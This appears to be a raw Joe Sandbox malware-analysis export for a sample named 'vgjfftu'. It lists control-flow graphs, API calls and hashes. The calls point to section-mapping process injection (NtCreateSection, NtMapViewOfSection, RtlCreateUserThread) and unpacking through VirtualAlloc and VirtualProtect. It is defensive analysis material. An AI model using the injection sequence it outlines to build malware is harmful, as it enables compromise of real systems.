                    control_flow_graph 0 418a70-418a98 2 418aa0-418aa7 0->2 3 418ad4-418ada 2->3 4 418aa9-418ad0 2->4 5 418adc-418ae8 3->5 6 418aee-418af8 3->6 4->3 5->6 7 418b33-418b3a 6->7 8 418afa-418b29 6->8 7->2 9 418b40-418b46 7->9 8->7 11 418b48-418b4e 9->11 12 418b50-418b56 11->12 13 418b5c-418b66 11->13 12->13 14 418b68 13->14 15 418b6a-418b71 13->15 14->15 15->11 16 418b73-418b7a 15->16 17 418b80-418c96 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 418cc6-418cd2 16->18 21 418ca4-418cab 17->21 22 418c98-418c9e ObjectPrivilegeAuditAlarmW 17->22 19 418cd4-418ce2 SetCommState 18->19 26 418ce4-418ceb 19->26 27 418ced-418cf4 19->27 24 418cb5-418cc3 21->24 25 418cad-418caf WaitForSingleObject 21->25 22->21 24->18 25->24 26->19 26->27 28 418daa-418db9 call 418740 27->28 29 418cfa-418da4 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 27->29 35 418dbb-418dcc 28->35 36 418ded-418df8 LoadLibraryA call 418770 28->36 29->28 39 418dd0-418de0 35->39 40 418dfd-418e0e call 4189d0 36->40 41 418de2 39->41 42 418de8-418deb 39->42 47 418e10-418e17 40->47 41->42 42->36 42->39 48 418e19-418e27 MoveFileW 47->48 49 418e2d-418e33 47->49 48->49 51 418e35 call 418760 49->51 52 418e3a-418e41 49->52 51->52 53 418e43-418e4e InterlockedCompareExchange 52->53 54 418e54-418e5b 52->54 53->54 54->47 57 418e5d-418e6d 54->57 58 418e70-418e80 57->58 60 418e82 58->60 61 418e89-418e8c 58->61 60->61 61->58 62 418e8e-418e99 61->62 63 418ea0-418ea5 62->63 64 418ea7-418ead 63->64 65 418eaf-418eb5 63->65 64->65 66 418eb7-418ec4 64->66 65->63 65->66
                    APIs
                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                    • GetFocus.USER32 ref: 00418B91
                    • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                    • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                    • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                    • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                    • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                    • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                    • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                    • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                    • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                    • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                    • SetCommState.KERNEL32(00000000,00000000), ref: 00418CD8
                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                    • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                    • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                    • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                    • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                    • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                    • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                    • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
                    • LoadLibraryA.KERNEL32(0041A3EC), ref: 00418DF2
                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.476519911.000000000040B000.00000020.00000001.01000000.0000000C.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_40b000_vgjfftu.jbxd
                    Similarity
                    • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                    • String ID: k`$}$
                    • API String ID: 2220722107-956986773
                    • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                    • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                    • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                    • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 68 4014db-4014e7 69 401486-40148b 68->69 70 4014e9 68->70 71 401550-401569 70->71 72 4014eb 70->72 77 40155d-40156c call 4011a4 71->77 74 40155a 72->74 75 4014ed-4014fb 72->75 74->77 80 40149a-4014a8 75->80 81 4014fd-4014ff 75->81 84 40156e-40157f 77->84 85 4014c1-4014c8 80->85 83 401501 81->83 81->84 88 401504-401518 83->88 89 40148f 83->89 86 401581 84->86 87 401584-401589 84->87 90 401469-401485 call 4011a4 85->90 91 4014ca 85->91 86->87 99 4018a6-4018ae 87->99 100 40158f-4015a0 87->100 88->85 92 40151a 88->92 89->80 90->69 91->68 95 401539-401555 92->95 96 40151c-401526 92->96 95->71 99->87 106 4018a4-4018b3 100->106 107 4015a6-4015cf 100->107 110 4018c8 106->110 111 4018b9-4018c4 106->111 107->106 116 4015d5-4015ec NtDuplicateObject 107->116 110->111 112 4018cb-4018ff call 4011a4 110->112 111->112 116->106 118 4015f2-401616 NtCreateSection 116->118 120 401672-401698 NtCreateSection 118->120 121 401618-401639 NtMapViewOfSection 118->121 120->106 124 40169e-4016a2 120->124 121->120 123 40163b-401657 NtMapViewOfSection 121->123 123->120 127 401659-40166f 123->127 124->106 125 4016a8-4016c9 NtMapViewOfSection 124->125 125->106 128 4016cf-4016eb NtMapViewOfSection 125->128 127->120 128->106 130 4016f1 call 4016f6 128->130
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectView
                    • String ID: 1
                    • API String ID: 1652636561-2212294583
                    • Opcode ID: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                    • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                    • Opcode Fuzzy Hash: fc9ad0c17474763d406ce3553705aad449b4f49c1046925f20dec018cbeb3551
                    • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 219 401529-401532 220 401543 219->220 221 401539-40153f 219->221 220->221 222 401546-40157f call 4011a4 220->222 221->222 232 401581 222->232 233 401584-401589 222->233 232->233 235 4018a6-4018ae 233->235 236 40158f-4015a0 233->236 235->233 239 4018a4-4018b3 236->239 240 4015a6-4015cf 236->240 243 4018c8 239->243 244 4018b9-4018c4 239->244 240->239 249 4015d5-4015ec NtDuplicateObject 240->249 243->244 245 4018cb-4018ff call 4011a4 243->245 244->245 249->239 251 4015f2-401616 NtCreateSection 249->251 253 401672-401698 NtCreateSection 251->253 254 401618-401639 NtMapViewOfSection 251->254 253->239 257 40169e-4016a2 253->257 254->253 256 40163b-401657 NtMapViewOfSection 254->256 256->253 260 401659-40166f 256->260 257->239 258 4016a8-4016c9 NtMapViewOfSection 257->258 258->239 261 4016cf-4016eb NtMapViewOfSection 258->261 260->253 261->239 263 4016f1 call 4016f6 261->263
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                    • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                    • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                    • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 267 401534-40157f call 4011a4 278 401581 267->278 279 401584-401589 267->279 278->279 281 4018a6-4018ae 279->281 282 40158f-4015a0 279->282 281->279 285 4018a4-4018b3 282->285 286 4015a6-4015cf 282->286 289 4018c8 285->289 290 4018b9-4018c4 285->290 286->285 295 4015d5-4015ec NtDuplicateObject 286->295 289->290 291 4018cb-4018ff call 4011a4 289->291 290->291 295->285 297 4015f2-401616 NtCreateSection 295->297 299 401672-401698 NtCreateSection 297->299 300 401618-401639 NtMapViewOfSection 297->300 299->285 303 40169e-4016a2 299->303 300->299 302 40163b-401657 NtMapViewOfSection 300->302 302->299 306 401659-40166f 302->306 303->285 304 4016a8-4016c9 NtMapViewOfSection 303->304 304->285 307 4016cf-4016eb NtMapViewOfSection 304->307 306->299 307->285 309 4016f1 call 4016f6 307->309
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                    • Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
                    • Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
                    • Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 313 401541-401543 315 401546-40157f call 4011a4 313->315 316 401539-40153f 313->316 326 401581 315->326 327 401584-401589 315->327 316->315 326->327 329 4018a6-4018ae 327->329 330 40158f-4015a0 327->330 329->327 333 4018a4-4018b3 330->333 334 4015a6-4015cf 330->334 337 4018c8 333->337 338 4018b9-4018c4 333->338 334->333 343 4015d5-4015ec NtDuplicateObject 334->343 337->338 339 4018cb-4018ff call 4011a4 337->339 338->339 343->333 345 4015f2-401616 NtCreateSection 343->345 347 401672-401698 NtCreateSection 345->347 348 401618-401639 NtMapViewOfSection 345->348 347->333 351 40169e-4016a2 347->351 348->347 350 40163b-401657 NtMapViewOfSection 348->350 350->347 354 401659-40166f 350->354 351->333 352 4016a8-4016c9 NtMapViewOfSection 351->352 352->333 355 4016cf-4016eb NtMapViewOfSection 352->355 354->347 355->333 357 4016f1 call 4016f6 355->357
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                    • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                    • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                    • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 380 4018c8 376->380 381 4018b9-4018c4 376->381 377->376 386 4015d5-4015ec NtDuplicateObject 377->386 380->381 382 4018cb-4018ff call 4011a4 380->382 381->382 386->376 388 4015f2-401616 NtCreateSection 386->388 390 401672-401698 NtCreateSection 388->390 391 401618-401639 NtMapViewOfSection 388->391 390->376 394 40169e-4016a2 390->394 391->390 393 40163b-401657 NtMapViewOfSection 391->393 393->390 397 401659-40166f 393->397 394->376 395 4016a8-4016c9 NtMapViewOfSection 394->395 395->376 398 4016cf-4016eb NtMapViewOfSection 395->398 397->390 398->376 400 4016f1 call 4016f6 398->400
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                    • Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
                    • Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
                    • Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 422 4018c8 418->422 423 4018b9-4018c4 418->423 419->418 428 4015d5-4015ec NtDuplicateObject 419->428 422->423 424 4018cb-4018ff call 4011a4 422->424 423->424 428->418 430 4015f2-401616 NtCreateSection 428->430 432 401672-401698 NtCreateSection 430->432 433 401618-401639 NtMapViewOfSection 430->433 432->418 436 40169e-4016a2 432->436 433->432 435 40163b-401657 NtMapViewOfSection 433->435 435->432 439 401659-40166f 435->439 436->418 437 4016a8-4016c9 NtMapViewOfSection 436->437 437->418 440 4016cf-4016eb NtMapViewOfSection 437->440 439->432 440->418 442 4016f1 call 4016f6 440->442
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                    • Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
                    • Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
                    • Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
                    APIs
                    Memory Dump Source
                    • Source File: 00000008.00000002.476515542.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_400000_vgjfftu.jbxd
                    Similarity
                    • API ID: CreateProcessTerminateThreadUser
                    • String ID:
                    • API String ID: 1921587553-0
                    • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                    • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                    • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                    • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 134 22003c-220047 135 220049 134->135 136 22004c-220263 call 220a3f call 220e0f call 220d90 VirtualAlloc 134->136 135->136 151 220265-220289 call 220a69 136->151 152 22028b-220292 136->152 157 2202ce-2203c2 VirtualProtect call 220cce call 220ce7 151->157 154 2202a1-2202b0 152->154 156 2202b2-2202cc 154->156 154->157 156->154 163 2203d1-2203e0 157->163 164 2203e2-220437 call 220ce7 163->164 165 220439-2204b8 VirtualFree 163->165 164->163 167 2205f4-2205fe 165->167 168 2204be-2204cd 165->168 171 220604-22060d 167->171 172 22077f-220789 167->172 170 2204d3-2204dd 168->170 170->167 174 2204e3-220505 170->174 171->172 177 220613-220637 171->177 175 2207a6-2207b0 172->175 176 22078b-2207a3 172->176 185 220517-220520 174->185 186 220507-220515 174->186 178 2207b6-2207cb 175->178 179 22086e-2208be LoadLibraryA 175->179 176->175 180 22063e-220648 177->180 182 2207d2-2207d5 178->182 184 2208c7-2208f9 179->184 180->172 183 22064e-22065a 180->183 187 2207d7-2207e0 182->187 188 220824-220833 182->188 183->172 189 220660-22066a 183->189 190 220902-22091d 184->190 191 2208fb-220901 184->191 192 220526-220547 185->192 186->192 193 2207e2 187->193 194 2207e4-220822 187->194 196 220839-22083c 188->196 195 22067a-220689 189->195 191->190 200 22054d-220550 192->200 193->188 194->182 197 220750-22077a 195->197 198 22068f-2206b2 195->198 196->179 199 22083e-220847 196->199 197->180 201 2206b4-2206ed 198->201 202 2206ef-2206fc 198->202 203 22084b-22086c 199->203 204 220849 199->204 206 2205e0-2205ef 200->206 207 220556-22056b 200->207 201->202 208 22074b 202->208 209 2206fe-220748 202->209 203->196 204->179 206->170 210 22056f-22057a 207->210 211 22056d 207->211 208->195 209->208 212 22059b-2205bb 210->212 213 22057c-220599 210->213 211->206 218 2205bd-2205db 212->218 213->218 218->200
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0022024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.472086421.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_220000_vgjfftu.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 63008dc5455b26ae5173438af7152297074d919cf4c282978a0906f11fd1f4e8
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 07526B74A11229DFDB64CF98D984BA8BBB1BF09304F1480D9E50DAB352DB30AE95DF14

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                    APIs
                    • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                    • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                    • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.476519911.000000000040B000.00000020.00000001.01000000.0000000C.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_40b000_vgjfftu.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProtectVirtual
                    • String ID:
                    • API String ID: 2099061454-3916222277
                    • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                    • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                    • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                    • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 464 99bef7-99bf10 465 99bf12-99bf14 464->465 466 99bf1b-99bf27 CreateToolhelp32Snapshot 465->466 467 99bf16 465->467 468 99bf29-99bf2f 466->468 469 99bf37-99bf44 Module32First 466->469 467->466 468->469 475 99bf31-99bf35 468->475 470 99bf4d-99bf55 469->470 471 99bf46-99bf47 call 99bbb6 469->471 476 99bf4c 471->476 475->465 475->469 476->470
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0099BF1F
                    • Module32First.KERNEL32(00000000,00000224), ref: 0099BF3F
                    Memory Dump Source
                    • Source File: 00000008.00000002.476562400.0000000000999000.00000040.00000020.00020000.00000000.sdmp, Offset: 00999000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_999000_vgjfftu.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 5152e06474cd0cc833f8ea3f5c46b06ccb2a89ecc12db894e46da2d6992c724c
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 27F06D36200711ABDB203BF9AD8DF6AB6ECAF49764F140968E642D15C0DB78EC454A61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 477 220e0f-220e24 SetErrorMode * 2 478 220e26 477->478 479 220e2b-220e2c 477->479 478->479
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,00220223,?,?), ref: 00220E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,00220223,?,?), ref: 00220E1E
                    Memory Dump Source
                    • Source File: 00000008.00000002.472086421.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_220000_vgjfftu.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: f23233c31a1da53253dfcacb42dea6b2ddc5ffc9e64891eed547aff6082d6eb8
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 1DD0123114512877D7002ED4DC09BCD7B1CDF09B62F008411FB0DD9081C7B0994046E5

                    Control-flow Graph

                    • Executed
                    • Not Executed
